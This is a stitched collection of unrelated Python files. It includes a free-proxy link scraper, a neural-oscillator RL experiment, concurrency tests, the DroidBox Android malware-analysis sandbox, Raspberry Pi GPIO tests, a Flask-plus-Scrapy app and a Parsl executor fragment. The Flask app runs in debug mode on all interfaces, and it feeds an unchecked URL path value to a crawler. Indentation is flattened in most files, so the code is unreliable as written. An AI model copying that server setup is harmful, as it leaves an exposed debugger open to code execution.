reverse(match.url_name, args=match.args, kwargs=match.captured_kwargs),
"/resolved-overridden/12/url/",
)
|
crawl-ssr.py
|
from urllib.request import *
from base64 import *
from threading import *
from queue import *
import re
ssrs = Queue()
threads = []
urls = [
'https://raw.githubusercontent.com/voken100g/AutoSSR/master/stable',
'https://raw.githubusercontent.com/voken100g/AutoSSR/master/online',
'https://raw.githubusercontent.com/voken100g/AutoSSR/master/recent'
]
def crawl(x: str, q: Queue):
print(f'Opening [{x}]!')
content = urlopen(x).read()
print(f'Contents from [{x}] received!')
    content += b'=' * (-len(content) % 4)  # pad to a multiple of 4 so base64 decoding succeeds
for x in urlsafe_b64decode(content).decode().splitlines():
q.put(x)
for x in urls:
threads.append(Thread(target=crawl, args=(x, ssrs)))
    threads[-1].daemon = True
threads[-1].start()
urls = [
'https://github.com/goFindAlex/FreeSS/blob/master/list.txt',
'https://github.com/nulastudio/Freedom/blob/master/docs/index.html'
]
def crawl2(x: str, q: Queue, pattern):
print(f'Opening [{x}]!')
content = urlopen(x).read().decode()
print(f'Contents from [{x}] received!')
for x in pattern.findall(content):
x = x[1:-1]
q.put(x)
for x in urls:
threads.append(
        Thread(target=crawl2, args=(x, ssrs, re.compile(r'\Wssr?://\w+\W'))))
    threads[-1].daemon = True
threads[-1].start()
for x in threads:
x.join(8)
if not ssrs.empty():
with open('ssrs.txt', 'w') as f:
while not ssrs.empty():
x = ssrs.get()
print(x, '\n\n')
f.write(x + '\n')
print("All done!")
for x in threads:
print(x)
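# Editor's sketch (assumption: a standard SSR share link carries an unpadded
# urlsafe-base64 payload after the 'ssr://' prefix): decoding one collected link
# into its plain "host:port:protocol:method:obfs:..." form.
from base64 import urlsafe_b64decode
def decode_ssr_link(link):
    body = link.split('://', 1)[1]
    body += '=' * (-len(body) % 4)  # restore the stripped base64 padding
    return urlsafe_b64decode(body).decode()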
|
2021-08-09.py
|
from multiprocessing import Process
from numpy import floor
import wandb
from behavior.oscillator import Oscillator
from job.learner import Learner
from rl_ctrnn.ctrnn import Ctrnn
from random import randint
THREAD_COUNT = 10
PROGENITOR = {
"time_constants": {0: 1.0, 1: 1.0},
"biases": {0: 5.154455202973727, 1: -10.756384207938911},
"weights": {
0: {0: 5.352730101212875, 1: 16.0},
1: {0: -11.915400080418113, 1: 2.7717190607157542},
},
}
def get_frozen(ctrnn: Ctrnn) -> float:
voltages = ctrnn.make_instance()
behavior = Oscillator(dt=0.01, size=ctrnn.size, duration=300, window=50)
behavior.setup(ctrnn.get_output(voltages))
while behavior.time < behavior.duration:
voltages = ctrnn.step(0.01, voltages)
behavior.grade(ctrnn.get_output(voltages))
return behavior.fitness
def get_log_data(m: Learner) -> dict:
data = {"Time": floor(m.behavior.time)}
data["distance"] = m.rlctrnn.distance
data["displacement"] = m.calculate_displacement()
# d_b = calculate_displacement(m.rlctrnn.center, WEIGHTS_OPTIMAL)
# data["remaining"] = d_b
data["performance"] = m.performance
data["reward"] = m.reward
data["flux"] = m.rlctrnn.flux
for y in range(m.rlctrnn.ctrnn.size):
for x in range(m.rlctrnn.ctrnn.size):
data[f"weight.{x}.{y}"] = m.rlctrnn.center[x, y]
return data
def main(seed):
progenitor = Ctrnn.from_dict(PROGENITOR)
PROGENITOR["fitness"] = get_frozen(progenitor)
run = wandb.init(project="temporary3", config={
"progenitor": PROGENITOR,
"seed": seed,
})
m = Learner(progenitor, seed)
m.behavior.dt = 0.01 # TODO: FIX EVERYWHERE
m.behavior.duration = 100
m.behavior.window = 10
time = -1
while m.is_running():
m.iter()
t = floor(m.behavior.time)
if t != time:
time = t
data = get_log_data(m)
run.log(data)
run.summary["fitness"] = get_frozen(m.rlctrnn.ctrnn)
run.finish()
if __name__ == "__main__":
for _ in range(1):
threads = []
for _ in range(THREAD_COUNT):
seed = randint(1, 100000)
threads.append(Process(target=main, args=(seed,)))
        for p in threads:
            p.start()
        for p in threads:
            p.join()
|
test_coordinate.py
|
# Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
from oslo_utils import uuidutils
from tacker.sol_refactored.common import coordinate
from tacker.sol_refactored.common import exceptions as sol_ex
from tacker.tests import base
class TestCoordinate(base.BaseTestCase):
def setUp(self):
super(TestCoordinate, self).setUp()
self.sem_1 = threading.Semaphore(value=0)
self.sem_2 = threading.Semaphore(value=0)
self.ok = False
@coordinate.lock_vnf_instance('{inst_id}')
def _work_thread_1(self, inst_id, sleep_time):
        # notify the parent that the lock is now held
self.sem_1.release()
        # wait for the parent's notification before releasing the lock
self.sem_2.acquire()
if sleep_time:
time.sleep(sleep_time)
@coordinate.lock_vnf_instance('{inst_id}')
def _work_thread_2(self, inst_id):
pass
@coordinate.lock_vnf_instance('{inst_id}', delay=True)
def _work_thread_3(self, inst_id):
self.ok = True
def test_lock_vnf_instance(self):
inst_id = uuidutils.generate_uuid()
th = threading.Thread(target=self._work_thread_1, args=(inst_id, 0))
th.start()
# wait to run _work_thread_1
self.sem_1.acquire()
self.assertRaises(sol_ex.OtherOperationInProgress,
self._work_thread_2, inst_id)
self.sem_2.release()
th.join()
def test_lock_vnf_instance_delay(self):
inst_id = uuidutils.generate_uuid()
th = threading.Thread(target=self._work_thread_1, args=(inst_id, 3))
th.start()
# wait to run _work_thread_1
self.sem_1.acquire()
self.sem_2.release()
self._work_thread_3(inst_id=inst_id)
th.join()
self.assertTrue(self.ok)
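# Editor's sketch (standalone, standard library only): the same two-semaphore
# handshake used in the tests above, shown with a plain threading.Lock standing
# in for the coordinate lock, to hold a worker inside its critical section at a
# deterministic point while the main thread probes for contention.
import threading
lock = threading.Lock()
entered = threading.Semaphore(0)   # worker -> main: "I now hold the lock"
release = threading.Semaphore(0)   # main -> worker: "you may release it"
def worker():
    with lock:
        entered.release()
        release.acquire()
t = threading.Thread(target=worker)
t.start()
entered.acquire()                        # wait until the worker holds the lock
assert not lock.acquire(blocking=False)  # a second acquire must fail right now
release.release()                        # let the worker leave the critical section
t.join()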
|
test_new_process.py
|
from multiprocessing import Process
import matplotlib.pyplot as plt
def plot_graph(*args):
plt.figure(figsize = (8,3))
plt.clf()
for data in args:
plt.plot(data)
plt.show()
if __name__ == '__main__':  # guard required for 'spawn' start methods (Windows/macOS)
    p = Process(target=plot_graph, args=([1, 2, 3],))
    p.start()
    print('yay')
    print('computation continues...')
    print('that rocks.')
    print("Now let's wait for the graph to be closed to continue...:")
    p.join()  # blocks until the plot window is closed and the child exits
|
droidbox.py
|
import hashlib
import json
import os
import re
import signal
import subprocess
import sys
import threading
import time
import zipfile
from datetime import datetime
from subprocess import call, PIPE, Popen
from threading import Thread
from xml.dom import minidom
from utils import AXMLPrinter
# I had to modify the DroidBox scripts to make them work with droidbot
__author__ = 'yuanchun'
################################################################################
# (c) 2011, The Honeynet Project
# Author: Patrik Lantz patrik@pjlantz.com and Laurent Delosieres ldelosieres@hispasec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
################################################################################
"""
Dynamically analyze Android applications
This script installs, runs, and analyzes Android applications, and at the end of
each analysis it outputs the application's characteristics in JSON.
Keep in mind that all data received/sent and read/written is shown in hexadecimal,
since the handled data can contain binary content.
"""
tags = {0x1: "TAINT_LOCATION", 0x2: "TAINT_CONTACTS", 0x4: "TAINT_MIC", 0x8: "TAINT_PHONE_NUMBER",
0x10: "TAINT_LOCATION_GPS", 0x20: "TAINT_LOCATION_NET", 0x40: "TAINT_LOCATION_LAST", 0x80: "TAINT_CAMERA",
0x100: "TAINT_ACCELEROMETER", 0x200: "TAINT_SMS", 0x400: "TAINT_IMEI", 0x800: "TAINT_IMSI",
0x1000: "TAINT_ICCID", 0x2000: "TAINT_DEVICE_SN", 0x4000: "TAINT_ACCOUNT", 0x8000: "TAINT_BROWSER",
0x10000: "TAINT_OTHERDB", 0x20000: "TAINT_FILECONTENT", 0x40000: "TAINT_PACKAGE", 0x80000: "TAINT_CALL_LOG",
0x100000: "TAINT_EMAIL", 0x200000: "TAINT_CALENDAR", 0x400000: "TAINT_SETTINGS"}
class LostADBException(Exception):
pass
class DroidBox(object):
def __init__(self, droidbot=None, output_dir=None):
self.sensitive_behaviors = []
self.enabled = True
self.droidbot = droidbot
self.logcat = None
self.application = None
self.apk_name = None
self.apk_hashes = None
self.applicationStarted = 0
self.is_counting_logs = False
self.timer = None
self.state_monitor = None
if self.droidbot:
self.state_monitor = self.droidbot.device.state_monitor
else:
from droidbot.state_monitor import StateMonitor
self.state_monitor = StateMonitor()
if output_dir:
self.output_dir = output_dir
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
else:
            # It is possible that no output files are generated
self.output_dir = None
def set_apk(self, apk_name):
if not self.enabled:
return
if apk_name is None:
return
# APK existing?
if not os.path.isfile(apk_name):
print("File %s not found" % apk_name)
sys.exit(1)
self.apk_name = os.path.abspath(apk_name)
self.application = Application(apk_name)
ret = self.application.processAPK()
# Error during the APK processing?
if ret == 0:
print("Failed to analyze the APK. Terminate the analysis.")
sys.exit(1)
main_activity = self.application.getMainActivity()
package_name = self.application.getPackage()
self.apk_hashes = self.application.getHashes()
# No Main activity found? Return an error
if main_activity is None:
print("No activity to start. Terminate the analysis.")
sys.exit(1)
# No packages identified? Return an error
if package_name is None:
print("No package found. Terminate the analysis.")
sys.exit(1)
# Execute the application
call(["adb", "logcat", "-c"])
ret = call(['monkeyrunner', 'monkeyrunner.py', apk_name,
package_name, main_activity], stderr=PIPE,
cwd=os.path.dirname(os.path.realpath(__file__)))
if ret == 1:
print("Failed to execute the application.")
sys.exit(1)
print("Starting the activity %s..." % main_activity)
# By default the application has not started
self.applicationStarted = 0
stringApplicationStarted = "Start proc %s" % package_name
# Open the adb logcat
if self.logcat is None:
self.logcat = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Wait for the application to start
while 1:
try:
logcatInput = self.logcat.stdout.readline()
if not logcatInput:
raise Exception("We have lost the connection with ADB.")
# Application started?
if (stringApplicationStarted in logcatInput):
self.applicationStarted = 1
break
except:
break
if (self.applicationStarted == 0):
print("Analysis has not been done.")
# Kill ADB, otherwise it will never terminate
os.kill(self.logcat.pid, signal.SIGTERM)
sys.exit(1)
print("Application started")
def start_unblocked(self, duration=0):
droidbox_thread = threading.Thread(target=self.start_blocked, args=(duration,))
droidbox_thread.start()
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
if self.logcat is not None:
self.logcat.terminate()
self.logcat = None
if self.state_monitor:
self.state_monitor.stop()
def start_blocked(self, duration=0):
if not self.enabled:
return
# curses.setupterm()
# sys.stdout.write(curses.tigetstr("clear"))
sys.stdout.flush()
call(["adb", "wait-for-device"])
call(['adb', 'logcat', '-c'])
print " ____ __ ____"
print "/\ _`\ __ /\ \/\ _`\\"
print "\ \ \/\ \ _ __ ___ /\_\ \_\ \ \ \L\ \ ___ __ _"
print " \ \ \ \ \/\`'__\ __`\/\ \ /'_` \ \ _ <' / __`\/\ \/'\\"
print " \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/> </"
print " \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
print " \/___/ \/_/\/___/ \/_/\/__,_ /\/___/ \/___/ \//\/_/"
counter = CountingThread()
counter.start()
if duration:
self.timer = threading.Timer(duration, self.stop)
self.timer.start()
if self.logcat is None:
self.logcat = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Collect DroidBox logs
self.is_counting_logs = True
self.lastScreenshot = 0
first_log_time = None
fd2path = {}
while self.enabled:
try:
if self.output_dir and (time.time() - self.lastScreenshot) >= 5:
# Take screenshots every 5 seconds.
os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
+ "_$(date +%Y-%m-%d_%H%M%S).png")
self.lastScreenshot = time.time()
logcatInput = self.logcat.stdout.readline()
if not logcatInput:
raise LostADBException("We have lost the connection with ADB.")
log_data = parse_log(logcatInput)
if log_data is None or not log_data['content'].startswith("DroidBox:"):
continue
log_time = log_data['datetime']
if first_log_time is None:
first_log_time = log_time
log_delta_seconds = (log_time - first_log_time).total_seconds()
log_content = json.loads(decode(log_data['content'][10:]))
log_process_names = self.state_monitor.get_names_by_pid(log_data['pid'])
log_process_name = "->".join(log_process_names)
for log_type in log_content:
log_detail = log_content[log_type]
if log_type == "FdAccess":
path = hexToStr(log_detail['path'])
fd2path[log_detail['id']] = path
log_detail['path'] = path
if log_type == "FileRW" and log_detail['id'] in fd2path:
log_detail['path'] = fd2path[log_detail['id']]
if log_type == "DataLeak":
log_detail['tag'] = getTags(int(log_detail['tag'], 16))
if log_detail['sink'] == "File" and log_detail['id'] in fd2path:
log_detail['path'] = fd2path[log_detail['id']]
log_dict = {"type": log_type,
"time": log_delta_seconds,
"process": log_process_name,
"detail": log_detail}
if self.filter_noises(log_dict):
continue
self.sensitive_behaviors.append(log_dict)
counter.increaseCount()
except KeyboardInterrupt:
break
except LostADBException:
break
except Exception as e:
print(e.message)
continue
self.is_counting_logs = False
counter.stopCounting()
counter.join()
# Kill ADB, otherwise it will never terminate
self.stop()
self.logcat = None
print json.dumps(self.get_output())
if self.output_dir is None:
return
with open(os.path.join(self.output_dir, "analysis.json"), "w") as json_file:
json_file.write(json.dumps(self.get_output(), sort_keys=True, indent=4))
def get_output(self):
# Done? Store the objects in a dictionary, transform it in a dict object and return it
output = dict()
# Sort the items by their key
output["recvsaction"] = self.application.getRecvsaction()
output["permissions"] = self.application.getPermissions()
output["hashes"] = self.apk_hashes
output["apkName"] = self.apk_name
output["sensitiveBehaviors"] = self.sensitive_behaviors
return output
def get_counts(self):
output = dict()
for behavior in self.sensitive_behaviors:
output[behavior['type']] = 0
for behavior in self.sensitive_behaviors:
output[behavior['type']] += 1
output["sum"] = sum(output.values())
return output
def filter_noises(self, log_dict):
"""
        filter useless noise from the log
:param log_dict: DroidBox log in dict format
:return: boolean
"""
if log_dict['type'] in ["FdAccess", "FileRW"]:
if log_dict['detail']['path'].startswith("socket") or log_dict['detail']['path'].startswith("pipe"):
return True
return False
class CountingThread(Thread):
"""
Used for user interface, showing in progress sign
and number of collected logs from the sandbox system
"""
def __init__(self):
"""
Constructor
"""
Thread.__init__(self)
self.stop = False
self.logs = 0
def stopCounting(self):
"""
Mark to stop this thread
"""
self.stop = True
def increaseCount(self):
self.logs += 1
def run(self):
"""
Update the progress sign and
number of collected logs
"""
signs = ['|', '/', '-', '\\']
counter = 0
while 1:
sign = signs[counter % len(signs)]
sys.stdout.write("[%s] Collected %s sandbox logs (Ctrl-C to view logs)\r" % (sign, str(self.logs)))
sys.stdout.flush()
time.sleep(0.5)
counter += 1
if self.stop:
print "[%s] Collected %s sandbox logs (Ctrl-C to view logs)" % ("*", str(self.logs))
break
class Application:
"""
Used for extracting information of an Android APK
"""
def __init__(self, filename):
self.filename = filename
self.packageNames = []
self.enfperm = []
self.permissions = []
self.recvs = []
self.activities = {}
self.recvsaction = {}
self.mainActivity = None
def processAPK(self):
xml = {}
error = True
try:
zip = zipfile.ZipFile(self.filename)
for i in zip.namelist():
if i == "AndroidManifest.xml":
try:
xml[i] = minidom.parseString(zip.read(i))
except:
xml[i] = minidom.parseString(AXMLPrinter(zip.read(i)).getBuff())
for item in xml[i].getElementsByTagName('manifest'):
self.packageNames.append(str(item.getAttribute("package")))
for item in xml[i].getElementsByTagName('permission'):
self.enfperm.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('uses-permission'):
self.permissions.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('receiver'):
self.recvs.append(str(item.getAttribute("android:name")))
for child in item.getElementsByTagName('action'):
self.recvsaction[str(item.getAttribute("android:name"))] = (
str(child.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('activity'):
activity = str(item.getAttribute("android:name"))
self.activities[activity] = {}
self.activities[activity]["actions"] = list()
for child in item.getElementsByTagName('action'):
self.activities[activity]["actions"].append(str(child.getAttribute("android:name")))
for activity in self.activities:
for action in self.activities[activity]["actions"]:
if action == 'android.intent.action.MAIN':
self.mainActivity = activity
error = False
break
if not error:
return 1
else:
return 0
except:
return 0
def getEnfperm(self):
return self.enfperm
def getRecvsaction(self):
return self.recvsaction
def getMainActivity(self):
return self.mainActivity
def getActivities(self):
return self.activities
def getPermissions(self):
return self.permissions
def getRecvActions(self):
return self.recvsaction
def getPackage(self):
# One application has only one package name
return self.packageNames[0]
    def getHashes(self, block_size=2 ** 8):
        """
        Calculate MD5, SHA-1 and SHA-256
        hashes of the APK input file
        @param block_size:
        """
        md5 = hashlib.md5()
        sha1 = hashlib.sha1()
        sha256 = hashlib.sha256()
        # Read the APK in chunks so large files do not have to fit in memory
        with open(self.filename, 'rb') as f:
            while True:
                data = f.read(block_size)
                if not data:
                    break
                md5.update(data)
                sha1.update(data)
                sha256.update(data)
        return [md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()]
def decode(s, encodings=('ascii', 'utf8', 'latin1')):
for encoding in encodings:
try:
return s.decode(encoding)
except UnicodeDecodeError:
pass
return s.decode('ascii', 'ignore')
def getTags(tagParam):
"""
Retrieve the tag names
"""
tagsFound = []
for tag in tags.keys():
if tagParam & tag != 0:
tagsFound.append(tags[tag])
return tagsFound
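# Illustrative example (not part of the original script): a DataLeak tag value
# of 0x402 combines two taint sources, so getTags(0x402) returns
# ["TAINT_CONTACTS", "TAINT_IMEI"] (ordering follows dict iteration order).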
def hexToStr(hexStr):
"""
Convert a string hex byte values into a byte string
"""
bytes = []
hexStr = ''.join(hexStr.split(" "))
for i in range(0, len(hexStr), 2):
bytes.append(chr(int(hexStr[i:i + 2], 16)))
return unicode(''.join(bytes), errors='replace')
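# Illustrative example (not part of the original script): hexToStr("48 65 6c 6c 6f")
# yields u"Hello" -- spaces are stripped, each hex pair becomes one character, and
# undecodable bytes are replaced.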
def interruptHandler(signum, frame):
"""
Raise interrupt for the blocking call 'logcatInput = sys.stdin.readline()'
"""
raise KeyboardInterrupt
# logcat regex, which will match the log message generated by `adb logcat -v threadtime`
LOGCAT_THREADTIME_RE = re.compile('^(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<pid>[0-9]+)\s+(?P<tid>[0-9]+)\s+'
'(?P<level>[VDIWEFS])\s+(?P<tag>[^:]*):\s+(?P<content>.*)$')
def parse_log(log_msg):
"""
parse a logcat message
the log should be in threadtime format
@param log_msg:
@return:
"""
m = LOGCAT_THREADTIME_RE.match(log_msg)
if not m:
return None
log_dict = {}
date = m.group('date')
time = m.group('time')
log_dict['pid'] = m.group('pid')
log_dict['tid'] = m.group('tid')
log_dict['level'] = m.group('level')
log_dict['tag'] = m.group('tag')
log_dict['content'] = m.group('content')
datetime_str = "%s-%s %s" % (datetime.today().year, date, time)
log_dict['datetime'] = datetime.strptime(datetime_str, "%Y-%m-%d %H:%M:%S.%f")
return log_dict
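# Illustrative input/output for parse_log() (the sample line below is made up):
#   parse_log('01-02 03:04:05.678  1234  1235 W DroidBox: {"DataLeak": {}}')
# returns {'pid': '1234', 'tid': '1235', 'level': 'W', 'tag': 'DroidBox',
# 'content': '{"DataLeak": {}}', ...} plus a 'datetime' built from the current year.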
def main():
argv = sys.argv
if len(argv) < 2 or len(argv) > 3:
print("Usage: droidbox.py filename.apk <duration in seconds>")
sys.exit(1)
duration = 0
# Duration given?
if len(argv) == 3:
duration = int(argv[2])
apkName = sys.argv[1]
# APK existing?
if os.path.isfile(apkName) == False:
print("File %s not found" % argv[1])
sys.exit(1)
droidbox = DroidBox()
droidbox.set_apk(apkName)
droidbox.start_blocked(duration)
# droidbox.get_output()
if __name__ == "__main__":
main()
|
test_job_handler.py
|
# test_job_handler.py
# How to start pytest?
# 1. def test_answer():
# 2. in test_sample.py
# 3. $ pytest
# 4. (only need assert exp, unlike unitest that you need to remember many assertTypes)
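# e.g. a minimal pytest test looks like this (illustrative only, not used below):
#   def test_answer():
#       assert 1 + 1 == 2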
import logging
import os  # used by _log_pid() below
import time
from client.controller import JobHandler
from client.controller_raspi import ControllerRPi
from utils_2.config_parser import ConfigReader
def _get_controller():
conf = ConfigReader().get_params()
controller_raspi = ControllerRPi(conf=conf)
return controller_raspi
def _get_action():
action = 1
return action
def test_job_handler():
controller_raspi = _get_controller()
action = _get_action()
job_handler = JobHandler(controller_raspi, action)
    logging.info(f'job handler doing action: {action}')
#job_handler = JobHandler(action)
job_handler.start()
time.sleep(5)
job_handler.join()
def test_movement_multiprocessing():
from multiprocessing import Process
import os
p = Process(target=movement, args=())
    # class multiprocessing.Process(group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None) # note that the default of args is ().
    # p.run()/start()/join(timeout)/name/is_alive()/daemon/pid/terminate()/kill()/close()
    # exception multiprocessing.ProcessError (base of all errors) / TimeoutError (specific error)
    # run(): method representing the process's activity; may be overridden, and by default invokes the callable passed as target.
    # start(): starts the process's activity; may be called at most once, and arranges for run() to be invoked in a separate process.
    # Can't use this as a task agent, since start() then close() can't be called multiple times on the same object.
    # The solution is to create a new Process object for each call (see the sketch right after this function).
logging.info(f'multiprocess starting movement program.')
_log_pid()
p.start()
p.join()
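# Sketch answering the question above (hypothetical helper, not used by the tests):
# a Process can be start()ed at most once, so a long-lived "task agent" has to
# build a fresh Process object for every task it runs.
def _run_task_in_new_process(task, *task_args):
    from multiprocessing import Process
    p = Process(target=task, args=task_args)
    p.start()   # start() may only be called once per Process object
    p.join()    # wait for the task to finish
    p.close()   # release the process object's resources (Python 3.7+)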
def _log_pid():
    logging.info(f'module name: {__name__}')
logging.info(f'parent process: {os.getppid()}')
logging.info(f'process id: {os.getpid()}')
def test_movement_subprocess():
import subprocess
logging.info(f'subprocess running controller_raspi.py main (do_action program).')
# subprocess.run(args, *, stdin=None, input=None, stdout=None, stderr=None, capture_output=False, shell=False, cwd=None, timeout=None, check=False, encoding=None, errors=None, text=None, env=None, universal_newlines=None, **other_popen_kwargs)
# subprocess.call(args, *, stdin=None, stdout=None, stderr=None, shell=False, cwd=None, timeout=None, **other_popen_kwargs)
    subprocess.run(['python3', '-m', 'client.controller_raspi'])
# Older high-level API
# subprocess.call(...)
    # Code needing to capture stdout or stderr should use run(...) instead (see the sketch after this function).
#subprocess.call([f'python -m core.{package_name}.{service_name} -e 1'], shell=True)
    logging.info(f'subprocess stopped controller_raspi.py main (do_action program).')
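# Sketch of capturing a child's output with subprocess.run() (illustrative only;
# capture_output/text require Python 3.7+, and the command shown is arbitrary):
def _run_and_capture(cmd=('python3', '--version')):
    import subprocess
    result = subprocess.run(list(cmd), capture_output=True, text=True)
    logging.info(f'returncode={result.returncode}, stdout={result.stdout.strip()}')
    return result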
def movement():
    import RPi.GPIO as GPIO  # assumed dependency: the pin calls below use the RPi.GPIO API
    GPIO.setmode(GPIO.BOARD)  # assumed: pins 11/12/13/15 refer to physical (board) pin numbers
    _log_pid()
backward_pin = 11 # white_pin
forward_pin = 12 # purple_pin
right_pin = 13 # green_pin
left_pin = 15 # blue_pin
seconds = 2
freq = 100
duty_cycle = 100
print(f'Enter pin number to turn on (11/12/13/15/-1 to exit): ')
pin = int(input())
try:
while pin != -1:
GPIO.setup(pin, GPIO.OUT)
pwm = GPIO.PWM(pin, freq)
pwm.start(duty_cycle)
print(f'pin {pin} is now on freq {freq} and duty cycle {duty_cycle} and for the next {seconds} seconds')
time.sleep(seconds)
pwm.stop()
print(f'pin {pin} stopped.')
print(f'Enter pin number to turn on: ')
pin = int(input())
    except:
        pass  # avoid cleaning up twice; the finally block below handles it
    finally:
        print('exiting.')
        GPIO.cleanup()
if __name__ == "__main__":
#test_job_handler()
    test_movement_multiprocessing()
#test_movement_subprocess()
|
app.py
|
from flask import Flask
from MOOC.spiders.mooc_spider import Moocspider
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from multiprocessing import Process
from flask_cors import CORS
app = Flask(__name__, static_folder='frontend')
CORS(app, supports_credentials=True)
def run_spider(course):
process = CrawlerProcess(get_project_settings())
process.crawl(Moocspider, urls=[course], video=0)
process.start()
@app.route("/course/<course>", methods=['GET'])
def spider(course):
p = Process(target=run_spider, args=(course, ))
p.start()
p.join()
return f"Spider is crawling: {course}"
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8081, debug=True)
|
executor.py
|
"""LowLatencyExecutor for low latency task/lambda-function execution
"""
from concurrent.futures import Future
import logging
import threading
import queue
# import pickle
from multiprocessing import Process, Queue
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.executors.low_latency import zmq_pipes
from parsl.executors.low_latency import interchange
from parsl.executors.errors import ScalingFailed, DeserializationError, BadMessage
from parsl.executors.base import ParslExecutor
# from parsl.dataflow.error import ConfigurationError
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class LowLatencyExecutor(ParslExecutor, RepresentationMixin):
"""
TODO: docstring for LowLatencyExecutor
"""
def __init__(self,
label='LowLatencyExecutor',
provider=LocalProvider(),
launch_cmd=None,
address="127.0.0.1",
worker_port=None,
worker_port_range=(54000, 55000),
interchange_port_range=(55000, 56000),
# storage_access=None,
working_dir=None,
worker_debug=False,
workers_per_node=1,
# cores_per_worker=1.0,
managed=True
):
logger.debug("Initializing LowLatencyExecutor")
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
# self.storage_access = storage_access if storage_access is not None else []
# if len(self.storage_access) > 1:
# raise ConfigurationError('Multiple storage access schemes are not supported')
self.working_dir = working_dir
self.managed = managed
self.blocks = []
self.tasks = {}
self.workers_per_node = workers_per_node
self._task_counter = 0
self.address = address
self.worker_port = worker_port
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.run_dir = '.'
# TODO: add debugging, logdir, other functionality to workers
if not launch_cmd:
self.launch_cmd = """lowlatency_worker.py -n {workers_per_node} --task_url={task_url} --logdir={logdir}"""
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing(
"127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming(
"127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}"
.format(self._queue_management_thread))
if self.provider:
# debug_opts = "--debug" if self.worker_debug else ""
l_cmd = self.launch_cmd.format( # debug=debug_opts,
task_url=self.worker_task_url,
workers_per_node=self.workers_per_node,
logdir="{}/{}".format(self.run_dir, self.label))
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = self.provider.scaling_enabled
logger.debug(
"Starting LowLatencyExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
for i in range(self.provider.init_blocks):
block = self.provider.submit(
self.launch_cmd, 1, self.workers_per_node)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
else:
self._scaling_enabled = False
logger.debug("Starting LowLatencyExecutor with no provider")
def _start_local_queue_process(self):
""" TODO: docstring """
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port),
"worker_port": self.worker_port,
"worker_port_range": self.worker_port_range
# TODO: logdir and logging level
})
self.queue_proc.start()
try:
worker_port = comm_q.get(block=True, timeout=120)
logger.debug(
"Got worker port {} from interchange".format(worker_port))
except queue.Empty:
logger.error(
"Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
self.worker_task_url = "tcp://{}:{}".format(
self.address, worker_port)
def _start_queue_management_thread(self):
""" TODO: docstring """
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(
target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def _queue_management_worker(self):
""" TODO: docstring """
logger.debug("[MTHREAD] queue management worker starting")
while True:
task_id, buf = self.incoming_q.get() # TODO: why does this hang?
msg = deserialize_object(buf)[0]
# TODO: handle exceptions
task_fut = self.tasks[task_id]
logger.debug("Got response for task id {}".format(task_id))
if "result" in msg:
task_fut.set_result(msg["result"])
elif "exception" in msg:
# TODO: handle exception
pass
elif 'exception' in msg:
logger.warning("Task: {} has returned with an exception")
try:
s, _ = deserialize_object(msg['exception'])
exception = ValueError("Remote exception description: {}".format(s))
task_fut.set_exception(exception)
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
